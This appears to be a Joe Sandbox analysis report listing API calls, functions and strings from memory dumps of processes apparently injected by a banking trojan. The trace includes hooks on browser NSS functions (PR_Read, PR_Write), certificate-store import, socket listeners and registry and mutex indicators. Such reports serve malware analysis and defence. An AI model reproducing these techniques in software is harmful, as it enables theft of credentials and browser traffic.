Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D26B28, Relevance: 6.0, APIs: 4, Instructions: 42

APIs

TranslateMessage.USER32(?), ref: 01D26B4A
DispatchMessageW.USER32(?), ref: 01D26B55
PeekMessageW.USER32(00000000), ref: 01D26B65
MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 01D26B79

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D24A30, Relevance: 6.0, APIs: 4, Instructions: 36

APIs

CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 01D24A3D
Thread32First.KERNEL32(00000000,?), ref: 01D24A58
Thread32Next.KERNEL32(00000000,0000001C), ref: 01D24A6E
CloseHandle.KERNEL32(00000000), ref: 01D24A79

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D2040D, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 217

APIs

Part of subcall function 01D26973: getsockname.WS2_32(?,?,?), ref: 01D26991

Part of subcall function 01D2636E: recv.WS2_32(?,?,00000001,00000000), ref: 01D26392

getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 01D204DC
freeaddrinfo.WS2_32(?,?,?,00000004), ref: 01D20515

Part of subcall function 01D264FD: socket.WS2_32(00000000,00000001,00000006), ref: 01D26506
Part of subcall function 01D264FD: bind.WS2_32(00000000,?,-0000001D), ref: 01D26526
Part of subcall function 01D264FD: listen.WS2_32(00000000,?), ref: 01D26535
Part of subcall function 01D264FD: #3.WS2_32(00000000,?,01D14C21,7FFFFFFF,?,00000000,00000080), ref: 01D26540

Part of subcall function 01D2672E: accept.WS2_32(00000000,00000000,00000001), ref: 01D26754

Part of subcall function 01D26403: socket.WS2_32(?,00000001,00000006), ref: 01D2640C
Part of subcall function 01D26403: connect.WS2_32(00000000,?,-0000001D), ref: 01D2642C
Part of subcall function 01D26403: #3.WS2_32(00000000), ref: 01D26437

Part of subcall function 01D267B6: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 01D267CC

Part of subcall function 01D265B7: recv.WS2_32(?,?,00000400,00000000), ref: 01D26600
Part of subcall function 01D265B7: #19.WS2_32(?,?,00000000,00000000), ref: 01D2661A
Part of subcall function 01D265B7: select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 01D26657

Part of subcall function 01D2675E: shutdown.WS2_32(?,00000002), ref: 01D26766
Part of subcall function 01D2675E: #3.WS2_32(?), ref: 01D2676D

Part of subcall function 01D20397: getpeername.WS2_32(000000FF,00000000,00000000), ref: 01D203BB
Part of subcall function 01D20397: getsockname.WS2_32(000000FF,00000000,00000000), ref: 01D203CA

Strings

Z, xrefs: 01D2064F

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D2773A, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 103

APIs

Part of subcall function 01D246F4: GetTickCount.KERNEL32(01D28766,?), ref: 01D246F4

CharUpperW.USER32(00000000), ref: 01D2785B

Strings

bcdfghklmnpqrstvwxz, xrefs: 01D27759
.exe, xrefs: 01D27745

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D2D64B, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101

APIs

PFXImportCertStore.CRYPT32(?,?,?), ref: 01D2D664

Part of subcall function 01D2262D: WaitForSingleObject.KERNEL32(00000000,01D1BC3F), ref: 01D22635

GetSystemTime.KERNEL32(?), ref: 01D2D6B0

Part of subcall function 01D2D42A: GetUserNameExW.SECUR32(00000002,?,00000001,?,?,?,01D2D581,?,?,00000000), ref: 01D2D43F

Part of subcall function 01D240AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 01D240CF

Strings

.txt, xrefs: 01D2D746

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D2A594, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97

APIs

Part of subcall function 01D254F1: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 01D25505
Part of subcall function 01D254F1: GetLastError.KERNEL32 ref: 01D2550F
Part of subcall function 01D254F1: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 01D2552F

Part of subcall function 01D255A1: HttpQueryInfoA.WININET(?,?,?,?,00000000), ref: 01D255BA
Part of subcall function 01D255A1: GetLastError.KERNEL32(?,00000000), ref: 01D255C0
Part of subcall function 01D255A1: HttpQueryInfoA.WININET(?,?,00000000,?,00000000), ref: 01D255E2

HttpQueryInfoA.WININET(?,0000002D,?,?,00000000), ref: 01D2A5F4

Part of subcall function 01D25547: InternetQueryOptionW.WININET(0000001C,0000001C,00000000,?), ref: 01D2555D
Part of subcall function 01D25547: GetLastError.KERNEL32(?,01D2A663,?,0000001C,?,00000000,00000048), ref: 01D25567
Part of subcall function 01D25547: InternetQueryOptionW.WININET(0000001C,0000001C,00000000,?), ref: 01D25589

Part of subcall function 01D233BB: HeapFree.KERNEL32(00000000,00000000,01D24BB2), ref: 01D233CE

Part of subcall function 01D16BD7: RegOpenKeyExW.ADVAPI32(80000001,01D327F0,00000000,00000001,?,?), ref: 01D16C00

Part of subcall function 01D29A9E: RegOpenKeyExW.ADVAPI32(80000001,01D33EC0,00000000,00000001,?), ref: 01D29ADD

Strings

G, xrefs: 01D2A615
nq<qFq, xrefs: 01D2A5F4

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D17EF9, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93

APIs

CoCreateInstance.OLE32(01D116C0,00000000,00004401,01D116D0,?), ref: 01D17F29
CoCreateInstance.OLE32(01D11690,00000000,00004401,01D116A0,?), ref: 01D17F7C

Strings

D, xrefs: 01D17FA7

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D27A14, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64

APIs

StringFromGUID2.OLE32(00000000,?,00000028), ref: 01D27AB5

Strings

Local\, xrefs: 01D27A9A
Global\, xrefs: 01D27A91

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D2515D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62

APIs

WaitForSingleObject.KERNEL32(00000000,00000000), ref: 01D25186

Part of subcall function 01D23346: HeapAlloc.KERNEL32(00000008,-00000003,01D236F5,?,?,00000000,01D241E1,?,01D22070,?,?,?,01D24191,?,?,?), ref: 01D23368
Part of subcall function 01D23346: HeapReAlloc.KERNEL32(00000008,00000200,-00000003,01D236F5,?,?,00000000,01D241E1,?,01D22070,?,?,?,01D24191,?,?), ref: 01D23379

InternetReadFile.WININET(?,00001000,00001000,00001000), ref: 01D251BD

Part of subcall function 01D233BB: HeapFree.KERNEL32(00000000,00000000,01D24BB2), ref: 01D233CE

Strings

PqZqdq2qnq<qFq, xrefs: 01D251BD

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D19C58, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56

APIs

SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?), ref: 01D19CA8

Part of subcall function 01D28AE4: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 01D28B23
Part of subcall function 01D28AE4: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 01D28B4A
Part of subcall function 01D28AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 01D28B94
Part of subcall function 01D28AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 01D28BC1
Part of subcall function 01D28AE4: Sleep.KERNEL32(00000000,?,?), ref: 01D28BF1
Part of subcall function 01D28AE4: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 01D28C1F
Part of subcall function 01D28AE4: FindClose.KERNEL32(?,?,?,?,00000000), ref: 01D28C31

Part of subcall function 01D233BB: HeapFree.KERNEL32(00000000,00000000,01D24BB2), ref: 01D233CE

Strings

#, xrefs: 01D19C8C
&, xrefs: 01D19C7E

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D1A579, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56

APIs

SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?), ref: 01D1A5C9

Part of subcall function 01D28AE4: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 01D28B23
Part of subcall function 01D28AE4: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 01D28B4A
Part of subcall function 01D28AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 01D28B94
Part of subcall function 01D28AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 01D28BC1
Part of subcall function 01D28AE4: Sleep.KERNEL32(00000000,?,?), ref: 01D28BF1
Part of subcall function 01D28AE4: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 01D28C1F
Part of subcall function 01D28AE4: FindClose.KERNEL32(?,?,?,?,00000000), ref: 01D28C31

Part of subcall function 01D233BB: HeapFree.KERNEL32(00000000,00000000,01D24BB2), ref: 01D233CE

Strings

&, xrefs: 01D1A59F
#, xrefs: 01D1A5AD

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D2A97E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55

APIs

Part of subcall function 01D2262D: WaitForSingleObject.KERNEL32(00000000,01D1BC3F), ref: 01D22635

HttpAddRequestHeadersW.WININET(?,?,?,A0000000), ref: 01D2A9D2

Part of subcall function 01D2A6AF: SetLastError.KERNEL32(00002F78), ref: 01D2A6F6
Part of subcall function 01D2A6AF: HttpAddRequestHeadersA.WININET(?,?,000000FF,A0000000), ref: 01D2A762
Part of subcall function 01D2A6AF: HttpAddRequestHeadersA.WININET(?,?,000000FF,80000000), ref: 01D2A77E
Part of subcall function 01D2A6AF: HttpAddRequestHeadersA.WININET(?,?,000000FF,80000000), ref: 01D2A795
Part of subcall function 01D2A6AF: EnterCriticalSection.KERNEL32(Function_00023F24), ref: 01D2A79D
Part of subcall function 01D2A6AF: LeaveCriticalSection.KERNEL32(Function_00023F24,?), ref: 01D2A853
Part of subcall function 01D2A6AF: EnterCriticalSection.KERNEL32(Function_00023F24), ref: 01D2A87A
Part of subcall function 01D2A6AF: LeaveCriticalSection.KERNEL32(Function_00023F24,?), ref: 01D2A8BA

HttpSendRequestExW.WININET(?,?,?,?,?), ref: 01D2AA0D

Strings

2qnq<qFq, xrefs: 01D2AA0D

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D2AA1A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55

APIs

Part of subcall function 01D2262D: WaitForSingleObject.KERNEL32(00000000,01D1BC3F), ref: 01D22635

HttpAddRequestHeadersA.WININET(?,?,?,A0000000), ref: 01D2AA6E

Part of subcall function 01D2A6AF: SetLastError.KERNEL32(00002F78), ref: 01D2A6F6
Part of subcall function 01D2A6AF: HttpAddRequestHeadersA.WININET(?,?,000000FF,A0000000), ref: 01D2A762
Part of subcall function 01D2A6AF: HttpAddRequestHeadersA.WININET(?,?,000000FF,80000000), ref: 01D2A77E
Part of subcall function 01D2A6AF: HttpAddRequestHeadersA.WININET(?,?,000000FF,80000000), ref: 01D2A795
Part of subcall function 01D2A6AF: EnterCriticalSection.KERNEL32(Function_00023F24), ref: 01D2A79D
Part of subcall function 01D2A6AF: LeaveCriticalSection.KERNEL32(Function_00023F24,?), ref: 01D2A853
Part of subcall function 01D2A6AF: EnterCriticalSection.KERNEL32(Function_00023F24), ref: 01D2A87A
Part of subcall function 01D2A6AF: LeaveCriticalSection.KERNEL32(Function_00023F24,?), ref: 01D2A8BA

HttpSendRequestExA.WININET(?,?,?,?,?), ref: 01D2AAA9

Strings

<qFq, xrefs: 01D2AAA9

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D22B08, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55

APIs

GetModuleHandleW.KERNEL32(?), ref: 01D22B1F
GetProcAddress.KERNEL32(00000000,?), ref: 01D22B41

Part of subcall function 01D233BB: HeapFree.KERNEL32(00000000,00000000,01D24BB2), ref: 01D233CE

Strings

0x01D9C0A0, xrefs: 01D22B63

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D28737, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47

APIs

GetTempPathW.KERNEL32(000000F6,?), ref: 01D2874E

Part of subcall function 01D246F4: GetTickCount.KERNEL32(01D28766,?), ref: 01D246F4

Part of subcall function 01D240AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 01D240CF

Part of subcall function 01D28C40: PathCombineW.SHLWAPI(01D21F45,01D21F45,?), ref: 01D28C5F

Part of subcall function 01D2856B: CreateFileW.KERNEL32(01D24E95,40000000,00000001,00000000,00000002,00000080,00000000), ref: 01D28585
Part of subcall function 01D2856B: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 01D285A8
Part of subcall function 01D2856B: CloseHandle.KERNEL32(00000000), ref: 01D285B5

Strings

%s%08x.%s, xrefs: 01D2876C
tmp, xrefs: 01D28767

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D26F8F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45

APIs

GetTempFileNameW.KERNEL32(?,cab,00000000,?), ref: 01D26FB1

Part of subcall function 01D28716: SetFileAttributesW.KERNEL32(00000080,00000080,01D2B4CD,?), ref: 01D2871F
Part of subcall function 01D28716: DeleteFileW.KERNEL32(?), ref: 01D28729

PathFindFileNameW.SHLWAPI(?), ref: 01D26FD3

Part of subcall function 01D2353A: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,01D24232,00000000,00000000,00000000,01D23597,00000000,00000000,00000000,?,00000000), ref: 01D23555

Strings

cab, xrefs: 01D26FA6

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D2C8A1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42

APIs

Part of subcall function 01D26AAA: GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,00000000,00000000,00000000,?,?,01D249F4,?,?,?,01D22326,000000FF,01D32C08), ref: 01D26AC3
Part of subcall function 01D26AAA: GetLastError.KERNEL32(?,?,01D249F4,?,?,?,01D22326,000000FF,01D32C08,?,?,00000000), ref: 01D26AC9
Part of subcall function 01D26AAA: GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,00000000,?,?,01D249F4,?,?,?,01D22326,000000FF,01D32C08), ref: 01D26AEF

EqualSid.ADVAPI32(00000000,00000000,?,00000000,?,01D2C9FB,00000000,?,?,?), ref: 01D2C8C6

Part of subcall function 01D233BB: HeapFree.KERNEL32(00000000,00000000,01D24BB2), ref: 01D233CE

Part of subcall function 01D24CDD: LoadLibraryA.KERNEL32(userenv.dll), ref: 01D24CEE
Part of subcall function 01D24CDD: GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock,00000000,?), ref: 01D24D0D
Part of subcall function 01D24CDD: GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 01D24D19
Part of subcall function 01D24CDD: CreateProcessAsUserW.ADVAPI32(?,00000000,01D2C8F5,00000000,00000000,00000000,01D2C8F5,01D2C8F5,00000000,?,?,?,00000000,00000044), ref: 01D24D8A
Part of subcall function 01D24CDD: CloseHandle.KERNEL32(?), ref: 01D24D9D
Part of subcall function 01D24CDD: CloseHandle.KERNEL32(?), ref: 01D24DA2
Part of subcall function 01D24CDD: FreeLibrary.KERNEL32(?), ref: 01D24DB9

CloseHandle.KERNEL32(?), ref: 01D2C907

Strings

"%s", xrefs: 01D2C8DA

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D25484, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39

APIs

Part of subcall function 01D25403: LoadLibraryA.KERNEL32(urlmon.dll), ref: 01D25414
Part of subcall function 01D25403: GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 01D25427
Part of subcall function 01D25403: FreeLibrary.KERNEL32(?), ref: 01D25479

GetTickCount.KERNEL32(?), ref: 01D254C9

Part of subcall function 01D252D1: WaitForSingleObject.KERNEL32(?,?), ref: 01D25325
Part of subcall function 01D252D1: Sleep.KERNEL32(?,?,?,00000000), ref: 01D25338
Part of subcall function 01D252D1: InternetCloseHandle.WININET(00000000), ref: 01D253BE

GetTickCount.KERNEL32(00000000), ref: 01D254DB

Part of subcall function 01D233BB: HeapFree.KERNEL32(00000000,00000000,01D24BB2), ref: 01D233CE

Strings

http://www.google.com/webhp, xrefs: 01D254A9

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D1A2EA, Relevance: 5.2, APIs: 4, Instructions: 197

APIs

Part of subcall function 01D28C40: PathCombineW.SHLWAPI(01D21F45,01D21F45,?), ref: 01D28C5F

Part of subcall function 01D285D0: CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000), ref: 01D285F5
Part of subcall function 01D285D0: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,01D22D27,?,?,00000000), ref: 01D28608
Part of subcall function 01D285D0: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,01D22D27,?,?,00000000), ref: 01D28630
Part of subcall function 01D285D0: ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 01D28648
Part of subcall function 01D285D0: VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,01D22D27,?,?,00000000), ref: 01D28662
Part of subcall function 01D285D0: CloseHandle.KERNEL32(?), ref: 01D2866B

StrStrIA.SHLWAPI(?,?), ref: 01D1A410
StrStrIA.SHLWAPI(?,?), ref: 01D1A422
StrStrIA.SHLWAPI(?,?), ref: 01D1A432
StrStrIA.SHLWAPI(?,?), ref: 01D1A444

Part of subcall function 01D240AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 01D240CF

Part of subcall function 01D233BB: HeapFree.KERNEL32(00000000,00000000,01D24BB2), ref: 01D233CE

Part of subcall function 01D28678: VirtualFree.KERNEL32(?,00000000,00008000,00000000,01D2C83B,?,?,.exe,00000000,00000000,?,.exe,00000006), ref: 01D28689
Part of subcall function 01D28678: CloseHandle.KERNEL32(?), ref: 01D28697

Part of subcall function 01D2338B: HeapAlloc.KERNEL32(00000008,-00000004,01D24B59,00000000,?,?,?,01D21E08,00000000,01D222ED,?,?,00000000), ref: 01D2339C

Part of subcall function 01D28AE4: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 01D28B23
Part of subcall function 01D28AE4: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 01D28B4A
Part of subcall function 01D28AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 01D28B94
Part of subcall function 01D28AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 01D28BC1
Part of subcall function 01D28AE4: Sleep.KERNEL32(00000000,?,?), ref: 01D28BF1
Part of subcall function 01D28AE4: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 01D28C1F
Part of subcall function 01D28AE4: FindClose.KERNEL32(?,?,?,?,00000000), ref: 01D28C31

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D2AD5F, Relevance: 5.1, APIs: 4, Instructions: 71

APIs

EnterCriticalSection.KERNEL32(01D33FB4,?,?,?,01D2B052,?), ref: 01D2AD7C

Part of subcall function 01D233BB: HeapFree.KERNEL32(00000000,00000000,01D24BB2), ref: 01D233CE

LeaveCriticalSection.KERNEL32(01D33FB4,?,?,?,01D2B052,?), ref: 01D2AD9D
EnterCriticalSection.KERNEL32(01D33FB4,?,?,?,?,01D2B052,?), ref: 01D2ADAE

Part of subcall function 01D23346: HeapAlloc.KERNEL32(00000008,-00000003,01D236F5,?,?,00000000,01D241E1,?,01D22070,?,?,?,01D24191,?,?,?), ref: 01D23368
Part of subcall function 01D23346: HeapReAlloc.KERNEL32(00000008,00000200,-00000003,01D236F5,?,?,00000000,01D241E1,?,01D22070,?,?,?,01D24191,?,?), ref: 01D23379

LeaveCriticalSection.KERNEL32(01D33FB4,?,?,?,01D2B052,?), ref: 01D2AE47

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Analysis Process: conhost.exe PID: 2072 Parent PID: 3700

Executed Functions

Function 001B20C4, Relevance: 49.2, APIs: 17, Strings: 11, Instructions: 229

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000000), ref: 001B2105
LoadLibraryA.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 001B2172
GetProcAddress.KERNELBASE(?,?,?,?,00000000), ref: 001B21A7
GetModuleHandleW.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 001B21DB
GetProcAddress.KERNEL32(00000000,NtCreateThread,?,?,00000000), ref: 001B21FA
GetProcAddress.KERNEL32(NtCreateUserProcess,?,?,00000000), ref: 001B220C
GetProcAddress.KERNEL32(NtQueryInformationProcess,?,?,00000000), ref: 001B221E
GetProcAddress.KERNEL32(RtlUserThreadStart,?,?,00000000), ref: 001B2230
GetProcAddress.KERNEL32(LdrLoadDll,?,?,00000000), ref: 001B2242
GetProcAddress.KERNEL32(LdrGetDllHandle,?,?,00000000), ref: 001B2254
HeapCreate.KERNELBASE(00000000,00080000,00000000,?,?,00000000), ref: 001B228D
GetProcessHeap.KERNEL32(?,?,00000000), ref: 001B229C
InitializeCriticalSection.KERNEL32(001C400C,?,?,00000000), ref: 001B22C9
WSAStartup.WS2_32(00000202,?), ref: 001B22DF
CreateEventW.KERNEL32(001C2C30,00000001,00000000,00000000,?,?,00000000), ref: 001B2300

Part of subcall function 001B49D2: OpenProcessToken.ADVAPI32(?,00000008,?,76C61857,?,?,001B2326,000000FF,001C2C08,?,?,00000000), ref: 001B49E2
Part of subcall function 001B49D2: GetTokenInformation.KERNELBASE(?,0000000C,00000000,00000004,00000000,?,?,?,001B2326,000000FF,001C2C08), ref: 001B4A0E
Part of subcall function 001B49D2: CloseHandle.KERNEL32(?), ref: 001B4A23

GetLengthSid.ADVAPI32(00000000,000000FF,001C2C08,?,?,00000000), ref: 001B2335

Part of subcall function 001B1E2D: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,C:\Users\admin\AppData\Roaming), ref: 001B1E4B
Part of subcall function 001B1E2D: PathRemoveBackslashW.SHLWAPI(C:\Users\admin\AppData\Roaming), ref: 001B1E5A
Part of subcall function 001B1E2D: GetModuleFileNameW.KERNEL32(00000000,?,00000104,76C61857), ref: 001B1E6E

GetCurrentProcessId.KERNEL32(00000000,0129F7D0,00000000,?,?,00000000), ref: 001B2362

Part of subcall function 001B1E8F: IsBadReadPtr.KERNEL32(?,?), ref: 001B1EBD

Part of subcall function 001B7A14: StringFromGUID2.OLE32(00000000,?,00000028), ref: 001B7AB5

Part of subcall function 001B1F98: InitializeCriticalSection.KERNEL32(001C3FB4,00000000,76C61857,00000000), ref: 001B1FAF
Part of subcall function 001B1F98: InitializeCriticalSection.KERNEL32(001C2AC8), ref: 001B1FE4
Part of subcall function 001B1F98: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001B200C
Part of subcall function 001B1F98: ReadFile.KERNEL32(00000000,?,000001FE,000001FE,00000000), ref: 001B2029
Part of subcall function 001B1F98: CloseHandle.KERNEL32(00000000), ref: 001B203A
Part of subcall function 001B1F98: InitializeCriticalSection.KERNEL32(001C23AC), ref: 001B2081
Part of subcall function 001B1F98: GetModuleHandleW.KERNEL32(nspr4.dll), ref: 001B2093
Part of subcall function 001B1F98: GetModuleHandleW.KERNEL32(nss3.dll), ref: 001B209E

Part of subcall function 001B1EE1: SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?), ref: 001B1F2C
Part of subcall function 001B1EE1: lstrcmpiW.KERNEL32(?,?,?), ref: 001B1F56

Strings

LdrGetDllHandle, xrefs: 001B2244
NtQueryInformationProcess, xrefs: 001B220E
NtCreateThread, xrefs: 001B21F4
RtlUserThreadStart, xrefs: 001B2220
Global\{A98E1C61-ACC4-103D-676C-E42BACAD1769}, xrefs: 001B23F3
NtCreateUserProcess, xrefs: 001B21FC
{3FF5AE44-1EE1-8646-676C-E42BACAD1769}, xrefs: 001B23AB
GetProcAddress, xrefs: 001B211D
LoadLibraryA, xrefs: 001B2127
LdrLoadDll, xrefs: 001B2232
SOFTWARE\Microsoft\Xyuxy, xrefs: 001B23F9

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001B1F98, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 91

APIs

InitializeCriticalSection.KERNEL32(001C3FB4,00000000,76C61857,00000000), ref: 001B1FAF
InitializeCriticalSection.KERNEL32(001C2AC8), ref: 001B1FE4

Part of subcall function 001B2828: PathRenameExtensionW.SHLWAPI(?,.dat), ref: 001B28A1

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001B200C
ReadFile.KERNEL32(00000000,?,000001FE,000001FE,00000000), ref: 001B2029
CloseHandle.KERNEL32(00000000), ref: 001B203A

Part of subcall function 001B9D6D: InitializeCriticalSection.KERNEL32(001C3F24,00000000,7718F8FF), ref: 001B9D8F
Part of subcall function 001B9D6D: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,00000000), ref: 001B9E63

Part of subcall function 001BB4D3: GetModuleHandleW.KERNEL32(nspr4.dll,00000000,7718F8FF,00000000), ref: 001BB4F0

InitializeCriticalSection.KERNEL32(001C23AC), ref: 001B2081

Part of subcall function 001AE0FB: GetCurrentThreadId.KERNEL32(7718F8FF), ref: 001AE108
Part of subcall function 001AE0FB: GetThreadDesktop.USER32(00000000), ref: 001AE10F
Part of subcall function 001AE0FB: GetUserObjectInformationW.USER32(00000000,00000002,?,00000064,?), ref: 001AE128

GetModuleHandleW.KERNEL32(nspr4.dll), ref: 001B2093
GetModuleHandleW.KERNEL32(nss3.dll), ref: 001B209E

Part of subcall function 001AC103: GetModuleHandleW.KERNEL32(nss3.dll,00000000,76C619C1,00000000,001B20A9), ref: 001AC111
Part of subcall function 001AC103: GetProcAddress.KERNEL32(00000000,PR_OpenTCPSocket,00000000,76C619C1,00000000,001B20A9), ref: 001AC125
Part of subcall function 001AC103: GetProcAddress.KERNEL32(00000000,PR_Close), ref: 001AC132
Part of subcall function 001AC103: GetProcAddress.KERNEL32(00000000,PR_Read), ref: 001AC13F
Part of subcall function 001AC103: GetProcAddress.KERNEL32(00000000,PR_Write), ref: 001AC14C

Strings

nss3.dll, xrefs: 001B2099
